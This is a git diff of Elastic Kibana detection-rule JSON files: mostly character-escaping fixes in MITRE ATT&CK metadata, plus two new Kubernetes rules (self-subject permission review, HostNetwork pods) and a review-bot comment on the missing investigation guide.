--- a/packages/security_detection_engine/kibana/security_rule/11dd9713-0ec6-4110-9707-32daae1ee68c_9.json
+++ b/packages/security_detection_engine/kibana/security_rule/11dd9713-0ec6-4110-9707-32daae1ee68c_9.json
@@ -54,7 +54,7 @@
 ],
 "risk_score": 47,
 "rule_id": "11dd9713-0ec6-4110-9707-32daae1ee68c",
- "setup": "\nThe 'PowerShell Script Block Logging' logging policy must be configured (Enable).\n\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration \u003e\nAdministrative Templates \u003e\nWindows PowerShell \u003e\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```\n",
+ "setup": "\nThe 'PowerShell Script Block Logging' logging policy must be configured (Enable).\n\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nAdministrative Templates >\nWindows PowerShell >\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```\n",
 "severity": "medium",
 "tags": [
 "Domain: Endpoint",
@@ -65,7 +65,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0004",
 "name": "Privilege Escalation",
@@ -87,7 +87,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0002",
 "name": "Execution",
diff --git a/packages/security_detection_engine/kibana/security_rule/11ea6bec-ebde-4d71-a8e9-784948f8e3e9_104.json b/packages/security_detection_engine/kibana/security_rule/11ea6bec-ebde-4d71-a8e9-784948f8e3e9_104.json
index a26f68d84c7..70d6cbbdb2e 100644
--- a/packages/security_detection_engine/kibana/security_rule/11ea6bec-ebde-4d71-a8e9-784948f8e3e9_104.json
+++ b/packages/security_detection_engine/kibana/security_rule/11ea6bec-ebde-4d71-a8e9-784948f8e3e9_104.json
@@ -56,7 +56,7 @@
 ],
 "risk_score": 47,
 "rule_id": "11ea6bec-ebde-4d71-a8e9-784948f8e3e9",
- "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "medium",
 "tags": [
 "Elastic",
@@ -69,7 +69,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0040",
 "name": "Impact",
diff --git a/packages/security_detection_engine/kibana/security_rule/11ea6bec-ebde-4d71-a8e9-784948f8e3e9_105.json b/packages/security_detection_engine/kibana/security_rule/11ea6bec-ebde-4d71-a8e9-784948f8e3e9_105.json
index 51fe1ad5d7c..afc7a878d84 100644
--- a/packages/security_detection_engine/kibana/security_rule/11ea6bec-ebde-4d71-a8e9-784948f8e3e9_105.json
+++ b/packages/security_detection_engine/kibana/security_rule/11ea6bec-ebde-4d71-a8e9-784948f8e3e9_105.json
@@ -71,7 +71,7 @@
 ],
 "risk_score": 47,
 "rule_id": "11ea6bec-ebde-4d71-a8e9-784948f8e3e9",
- "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "medium",
 "tags": [
 "Elastic",
@@ -84,7 +84,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0040",
 "name": "Impact",
diff --git a/packages/security_detection_engine/kibana/security_rule/11ea6bec-ebde-4d71-a8e9-784948f8e3e9_106.json b/packages/security_detection_engine/kibana/security_rule/11ea6bec-ebde-4d71-a8e9-784948f8e3e9_106.json
index 0bfc8600ac0..9c657b37c11 100644
--- a/packages/security_detection_engine/kibana/security_rule/11ea6bec-ebde-4d71-a8e9-784948f8e3e9_106.json
+++ b/packages/security_detection_engine/kibana/security_rule/11ea6bec-ebde-4d71-a8e9-784948f8e3e9_106.json
@@ -71,7 +71,7 @@
 ],
 "risk_score": 47,
 "rule_id": "11ea6bec-ebde-4d71-a8e9-784948f8e3e9",
- "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "medium",
 "tags": [
 "Domain: Endpoint",
@@ -83,7 +83,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0040",
 "name": "Impact",
diff --git a/packages/security_detection_engine/kibana/security_rule/11ea6bec-ebde-4d71-a8e9-784948f8e3e9_107.json b/packages/security_detection_engine/kibana/security_rule/11ea6bec-ebde-4d71-a8e9-784948f8e3e9_107.json
index 68e7fd3e07c..c400742223d 100644
--- a/packages/security_detection_engine/kibana/security_rule/11ea6bec-ebde-4d71-a8e9-784948f8e3e9_107.json
+++ b/packages/security_detection_engine/kibana/security_rule/11ea6bec-ebde-4d71-a8e9-784948f8e3e9_107.json
@@ -71,7 +71,7 @@
 ],
 "risk_score": 47,
 "rule_id": "11ea6bec-ebde-4d71-a8e9-784948f8e3e9",
- "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "medium",
 "tags": [
 "Domain: Endpoint",
@@ -84,7 +84,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0040",
 "name": "Impact",
diff --git a/packages/security_detection_engine/kibana/security_rule/11ea6bec-ebde-4d71-a8e9-784948f8e3e9_108.json b/packages/security_detection_engine/kibana/security_rule/11ea6bec-ebde-4d71-a8e9-784948f8e3e9_108.json
index dcc47ae8079..643bb696536 100644
--- a/packages/security_detection_engine/kibana/security_rule/11ea6bec-ebde-4d71-a8e9-784948f8e3e9_108.json
+++ b/packages/security_detection_engine/kibana/security_rule/11ea6bec-ebde-4d71-a8e9-784948f8e3e9_108.json
@@ -71,7 +71,7 @@
 ],
 "risk_score": 47,
 "rule_id": "11ea6bec-ebde-4d71-a8e9-784948f8e3e9",
- "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "medium",
 "tags": [
 "Domain: Endpoint",
@@ -84,7 +84,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0040",
 "name": "Impact",
diff --git a/packages/security_detection_engine/kibana/security_rule/11ea6bec-ebde-4d71-a8e9-784948f8e3e9_109.json b/packages/security_detection_engine/kibana/security_rule/11ea6bec-ebde-4d71-a8e9-784948f8e3e9_109.json
index 6fee719af3a..79e1a762a76 100644
--- a/packages/security_detection_engine/kibana/security_rule/11ea6bec-ebde-4d71-a8e9-784948f8e3e9_109.json
+++ b/packages/security_detection_engine/kibana/security_rule/11ea6bec-ebde-4d71-a8e9-784948f8e3e9_109.json
@@ -71,7 +71,7 @@
 ],
 "risk_score": 47,
 "rule_id": "11ea6bec-ebde-4d71-a8e9-784948f8e3e9",
- "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n",
+ "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n",
 "severity": "medium",
 "tags": [
 "Domain: Endpoint",
@@ -84,7 +84,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0040",
 "name": "Impact",
diff --git a/packages/security_detection_engine/kibana/security_rule/12051077-0124-4394-9522-8f4f4db1d674_102.json b/packages/security_detection_engine/kibana/security_rule/12051077-0124-4394-9522-8f4f4db1d674_102.json
index dcd0cb62612..892e59bd2ee 100644
--- a/packages/security_detection_engine/kibana/security_rule/12051077-0124-4394-9522-8f4f4db1d674_102.json
+++ b/packages/security_detection_engine/kibana/security_rule/12051077-0124-4394-9522-8f4f4db1d674_102.json
@@ -67,7 +67,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0003",
 "name": "Persistence",
@@ -82,7 +82,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0006",
 "name": "Credential Access",
diff --git a/packages/security_detection_engine/kibana/security_rule/12051077-0124-4394-9522-8f4f4db1d674_103.json b/packages/security_detection_engine/kibana/security_rule/12051077-0124-4394-9522-8f4f4db1d674_103.json
index 215dd753e61..228f70ab1af 100644
--- a/packages/security_detection_engine/kibana/security_rule/12051077-0124-4394-9522-8f4f4db1d674_103.json
+++ b/packages/security_detection_engine/kibana/security_rule/12051077-0124-4394-9522-8f4f4db1d674_103.json
@@ -65,7 +65,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0003",
 "name": "Persistence",
@@ -80,7 +80,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0006",
 "name": "Credential Access",
diff --git a/packages/security_detection_engine/kibana/security_rule/12051077-0124-4394-9522-8f4f4db1d674_104.json b/packages/security_detection_engine/kibana/security_rule/12051077-0124-4394-9522-8f4f4db1d674_104.json
index 7de06d92781..3368531526a 100644
--- a/packages/security_detection_engine/kibana/security_rule/12051077-0124-4394-9522-8f4f4db1d674_104.json
+++ b/packages/security_detection_engine/kibana/security_rule/12051077-0124-4394-9522-8f4f4db1d674_104.json
@@ -65,7 +65,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0003",
 "name": "Persistence",
@@ -80,7 +80,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0006",
 "name": "Credential Access",
diff --git a/packages/security_detection_engine/kibana/security_rule/12051077-0124-4394-9522-8f4f4db1d674_205.json b/packages/security_detection_engine/kibana/security_rule/12051077-0124-4394-9522-8f4f4db1d674_205.json
index 6885bf5d2a9..10735731129 100644
--- a/packages/security_detection_engine/kibana/security_rule/12051077-0124-4394-9522-8f4f4db1d674_205.json
+++ b/packages/security_detection_engine/kibana/security_rule/12051077-0124-4394-9522-8f4f4db1d674_205.json
@@ -65,7 +65,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0003",
 "name": "Persistence",
@@ -80,7 +80,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0006",
 "name": "Credential Access",
diff --git a/packages/security_detection_engine/kibana/security_rule/1224da6c-0326-4b4f-8454-68cdc5ae542b_1.json b/packages/security_detection_engine/kibana/security_rule/1224da6c-0326-4b4f-8454-68cdc5ae542b_1.json
index 27d71eee5e3..3692fa53ec1 100644
--- a/packages/security_detection_engine/kibana/security_rule/1224da6c-0326-4b4f-8454-68cdc5ae542b_1.json
+++ b/packages/security_detection_engine/kibana/security_rule/1224da6c-0326-4b4f-8454-68cdc5ae542b_1.json
@@ -36,7 +36,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/128468bf-cab1-4637-99ea-fdf3780a4609_105.json b/packages/security_detection_engine/kibana/security_rule/128468bf-cab1-4637-99ea-fdf3780a4609_105.json
index 40190b54615..7115b86d410 100644
--- a/packages/security_detection_engine/kibana/security_rule/128468bf-cab1-4637-99ea-fdf3780a4609_105.json
+++ b/packages/security_detection_engine/kibana/security_rule/128468bf-cab1-4637-99ea-fdf3780a4609_105.json
@@ -62,7 +62,7 @@
 ],
 "risk_score": 47,
 "rule_id": "128468bf-cab1-4637-99ea-fdf3780a4609",
- "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "medium",
 "tags": [
 "Domain: Endpoint",
@@ -73,7 +73,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0006",
 "name": "Credential Access",
diff --git a/packages/security_detection_engine/kibana/security_rule/128468bf-cab1-4637-99ea-fdf3780a4609_106.json b/packages/security_detection_engine/kibana/security_rule/128468bf-cab1-4637-99ea-fdf3780a4609_106.json
index 2acc756d57a..2cab838b694 100644
--- a/packages/security_detection_engine/kibana/security_rule/128468bf-cab1-4637-99ea-fdf3780a4609_106.json
+++ b/packages/security_detection_engine/kibana/security_rule/128468bf-cab1-4637-99ea-fdf3780a4609_106.json
@@ -61,7 +61,7 @@
 ],
 "risk_score": 47,
 "rule_id": "128468bf-cab1-4637-99ea-fdf3780a4609",
- "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n",
 "severity": "medium",
 "tags": [
 "Domain: Endpoint",
@@ -72,7 +72,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0006",
 "name": "Credential Access",
diff --git a/packages/security_detection_engine/kibana/security_rule/128468bf-cab1-4637-99ea-fdf3780a4609_2.json b/packages/security_detection_engine/kibana/security_rule/128468bf-cab1-4637-99ea-fdf3780a4609_2.json
index e53b8199321..6e223f4cfd7 100644
--- a/packages/security_detection_engine/kibana/security_rule/128468bf-cab1-4637-99ea-fdf3780a4609_2.json
+++ b/packages/security_detection_engine/kibana/security_rule/128468bf-cab1-4637-99ea-fdf3780a4609_2.json
@@ -62,7 +62,7 @@
 ],
 "risk_score": 47,
 "rule_id": "128468bf-cab1-4637-99ea-fdf3780a4609",
- "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "medium",
 "tags": [
 "Elastic",
@@ -74,7 +74,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0006",
 "name": "Credential Access",
diff --git a/packages/security_detection_engine/kibana/security_rule/128468bf-cab1-4637-99ea-fdf3780a4609_3.json b/packages/security_detection_engine/kibana/security_rule/128468bf-cab1-4637-99ea-fdf3780a4609_3.json
index 62a83dab4ef..315607a6177 100644
--- a/packages/security_detection_engine/kibana/security_rule/128468bf-cab1-4637-99ea-fdf3780a4609_3.json
+++ b/packages/security_detection_engine/kibana/security_rule/128468bf-cab1-4637-99ea-fdf3780a4609_3.json
@@ -62,7 +62,7 @@
 ],
 "risk_score": 47,
 "rule_id": "128468bf-cab1-4637-99ea-fdf3780a4609",
- "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "medium",
 "tags": [
 "Domain: Endpoint",
@@ -73,7 +73,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0006",
 "name": "Credential Access",
diff --git a/packages/security_detection_engine/kibana/security_rule/128468bf-cab1-4637-99ea-fdf3780a4609_4.json b/packages/security_detection_engine/kibana/security_rule/128468bf-cab1-4637-99ea-fdf3780a4609_4.json
index 6071b0f7fe8..65fa17451c6 100644
--- a/packages/security_detection_engine/kibana/security_rule/128468bf-cab1-4637-99ea-fdf3780a4609_4.json
+++ b/packages/security_detection_engine/kibana/security_rule/128468bf-cab1-4637-99ea-fdf3780a4609_4.json
@@ -62,7 +62,7 @@
 ],
 "risk_score": 47,
 "rule_id": "128468bf-cab1-4637-99ea-fdf3780a4609",
- "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "medium",
 "tags": [
 "Domain: Endpoint",
@@ -73,7 +73,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0006",
 "name": "Credential Access",
diff --git a/packages/security_detection_engine/kibana/security_rule/12a2f15d-597e-4334-88ff-38a02cb1330b_201.json b/packages/security_detection_engine/kibana/security_rule/12a2f15d-597e-4334-88ff-38a02cb1330b_201.json
index 1802695d1df..85b3169d885 100644
--- a/packages/security_detection_engine/kibana/security_rule/12a2f15d-597e-4334-88ff-38a02cb1330b_201.json
+++ b/packages/security_detection_engine/kibana/security_rule/12a2f15d-597e-4334-88ff-38a02cb1330b_201.json
@@ -70,7 +70,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0007",
 "name": "Discovery",
diff --git a/packages/security_detection_engine/kibana/security_rule/12a2f15d-597e-4334-88ff-38a02cb1330b_202.json b/packages/security_detection_engine/kibana/security_rule/12a2f15d-597e-4334-88ff-38a02cb1330b_202.json
index 45a44181f5d..ae797fa2092 100644
--- a/packages/security_detection_engine/kibana/security_rule/12a2f15d-597e-4334-88ff-38a02cb1330b_202.json
+++ b/packages/security_detection_engine/kibana/security_rule/12a2f15d-597e-4334-88ff-38a02cb1330b_202.json
@@ -68,7 +68,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0007",
 "name": "Discovery",
diff --git a/packages/security_detection_engine/kibana/security_rule/12a2f15d-597e-4334-88ff-38a02cb1330b_203.json b/packages/security_detection_engine/kibana/security_rule/12a2f15d-597e-4334-88ff-38a02cb1330b_203.json
new file mode 100644
index 00000000000..7271452ec7b
--- /dev/null
+++ b/packages/security_detection_engine/kibana/security_rule/12a2f15d-597e-4334-88ff-38a02cb1330b_203.json
@@ -0,0 +1,92 @@
+{
+ "attributes": {
+ "author": [
+ "Elastic"
+ ],
+ "description": "This rule detects when a service account or node attempts to enumerate their own permissions via the selfsubjectaccessreview or selfsubjectrulesreview APIs. This is highly unusual behavior for non-human identities like service accounts and nodes. An adversary may have gained access to credentials/tokens and this could be an attempt to determine what privileges they have to facilitate further movement or execution within the cluster.",
+ "false_positives": [
+ "An administrator may submit this request as an \"impersonatedUser\" to determine what privileges a particular service account has been granted. However, an adversary may utilize the same technique as a means to determine the privileges of another token other than that of the compromised account."
+ ],
+ "index": [
+ "logs-kubernetes.*"
+ ],
+ "language": "kuery",
+ "license": "Elastic License v2",
+ "name": "Kubernetes Suspicious Self-Subject Review",
+ "note": "",
+ "query": "event.dataset : \"kubernetes.audit_logs\"\n and kubernetes.audit.annotations.authorization_k8s_io/decision:\"allow\"\n and kubernetes.audit.verb:\"create\"\n and kubernetes.audit.objectRef.resource:(\"selfsubjectaccessreviews\" or \"selfsubjectrulesreviews\")\n and (kubernetes.audit.user.username:(system\\:serviceaccount\\:* or system\\:node\\:*)\n or kubernetes.audit.impersonatedUser.username:(system\\:serviceaccount\\:* or system\\:node\\:*))\n",
+ "references": [
+ "https://www.paloaltonetworks.com/apps/pan/public/downloadResource?pagePath=/content/pan/en_US/resources/whitepapers/kubernetes-privilege-escalation-excessive-permissions-in-popular-platforms",
+ "https://kubernetes.io/docs/reference/access-authn-authz/authorization/#checking-api-access",
+ "https://techcommunity.microsoft.com/t5/microsoft-defender-for-cloud/detecting-identity-attacks-in-kubernetes/ba-p/3232340"
+ ],
+ "related_integrations": [
+ {
+ "package": "kubernetes",
+ "version": "^1.4.1"
+ }
+ ],
+ "required_fields": [
+ {
+ "ecs": true,
+ "name": "event.dataset",
+ "type": "keyword"
+ },
+ {
+ "ecs": false,
+ "name": "kubernetes.audit.annotations.authorization_k8s_io/decision",
+ "type": "keyword"
+ },
+ {
+ "ecs": false,
+ "name": "kubernetes.audit.impersonatedUser.username",
+ "type": "keyword"
+ },
+ {
+ "ecs": false,
+ "name": "kubernetes.audit.objectRef.resource",
+ "type": "keyword"
+ },
+ {
+ "ecs": false,
+ "name": "kubernetes.audit.user.username",
+ "type": "keyword"
+ },
+ {
+ "ecs": false,
+ "name": "kubernetes.audit.verb",
+ "type": "keyword"
+ }
+ ],
+ "risk_score": 47,
+ "rule_id": "12a2f15d-597e-4334-88ff-38a02cb1330b",
+ "setup": "The Kubernetes Fleet integration with Audit Logs enabled or similarly structured data is required to be compatible with this rule.",
+ "severity": "medium",
+ "tags": [
+ "Data Source: Kubernetes",
+ "Tactic: Discovery"
+ ],
+ "threat": [
+ {
+ "framework": "MITRE ATT&CK",
+ "tactic": {
+ "id": "TA0007",
+ "name": "Discovery",
+ "reference": "https://attack.mitre.org/tactics/TA0007/"
+ },
+ "technique": [
+ {
+ "id": "T1613",
+ "name": "Container and Resource Discovery",
+ "reference": "https://attack.mitre.org/techniques/T1613/"
+ }
+ ]
+ }
+ ],
+ "timestamp_override": "event.ingested",
+ "type": "query",
+ "version": 203
+ },
+ "id": "12a2f15d-597e-4334-88ff-38a02cb1330b_203",
+ "type": "security-rule"
+}
\ No newline at end of file
diff --git a/packages/security_detection_engine/kibana/security_rule/12cbf709-69e8-4055-94f9-24314385c27e_201.json b/packages/security_detection_engine/kibana/security_rule/12cbf709-69e8-4055-94f9-24314385c27e_201.json
index 959528675fc..e9ad1b27d3f 100644
--- a/packages/security_detection_engine/kibana/security_rule/12cbf709-69e8-4055-94f9-24314385c27e_201.json
+++ b/packages/security_detection_engine/kibana/security_rule/12cbf709-69e8-4055-94f9-24314385c27e_201.json
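Review bot: The new rule ships with `"note": ""`, so an analyst who receives this medium-severity alert gets no investigation guide even though the description itself says the behaviour is "highly unusual" and may indicate a stolen token. The `query` gives the natural pivots: `kubernetes.audit.user.username` (or `kubernetes.audit.impersonatedUser.username` when an admin is impersonating, which the `false_positives` entry already anticipates), and the requests that identity makes immediately afterwards, since a self-subject review is usually followed by whatever the caller learned it was allowed to do. Suggest populating `note` with a short guide along those lines, and stating explicitly that any exclusion for a controller that legitimately calls these APIs should be keyed on the exact service-account username rather than by loosening the `system\:serviceaccount\:*` wildcard. This JSON appears to be a generated Kibana artifact of the upstream rule, so the text presumably belongs in the rule source and should be regenerated from there.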
@@ -71,7 +71,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0004",
 "name": "Privilege Escalation",
@@ -86,7 +86,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0002",
 "name": "Execution",
diff --git a/packages/security_detection_engine/kibana/security_rule/12cbf709-69e8-4055-94f9-24314385c27e_202.json b/packages/security_detection_engine/kibana/security_rule/12cbf709-69e8-4055-94f9-24314385c27e_202.json
index dc8a147da3d..af627797337 100644
--- a/packages/security_detection_engine/kibana/security_rule/12cbf709-69e8-4055-94f9-24314385c27e_202.json
+++ b/packages/security_detection_engine/kibana/security_rule/12cbf709-69e8-4055-94f9-24314385c27e_202.json
@@ -69,7 +69,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0004",
 "name": "Privilege Escalation",
@@ -84,7 +84,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0002",
 "name": "Execution",
diff --git a/packages/security_detection_engine/kibana/security_rule/12cbf709-69e8-4055-94f9-24314385c27e_203.json b/packages/security_detection_engine/kibana/security_rule/12cbf709-69e8-4055-94f9-24314385c27e_203.json
new file mode 100644
index 00000000000..3b58320a1a8
--- /dev/null
+++ b/packages/security_detection_engine/kibana/security_rule/12cbf709-69e8-4055-94f9-24314385c27e_203.json
@@ -0,0 +1,108 @@
+{
+ "attributes": {
+ "author": [
+ "Elastic"
+ ],
+ "description": "This rules detects an attempt to create or modify a pod attached to the host network. HostNetwork allows a pod to use the node network namespace. Doing so gives the pod access to any service running on localhost of the host. An attacker could use this access to snoop on network activity of other pods on the same node or bypass restrictive network policies applied to its given namespace.",
+ "false_positives": [
+ "An administrator or developer may want to use a pod that runs as root and shares the hosts IPC, Network, and PID namespaces for debugging purposes. If something is going wrong in the cluster and there is no easy way to SSH onto the host nodes directly, a privileged pod of this nature can be useful for viewing things like iptable rules and network namespaces from the host's perspective. Add exceptions for trusted container images using the query field \"kubernetes.audit.requestObject.spec.container.image\""
+ ],
+ "index": [
+ "logs-kubernetes.*"
+ ],
+ "language": "kuery",
+ "license": "Elastic License v2",
+ "name": "Kubernetes Pod Created With HostNetwork",
+ "note": "",
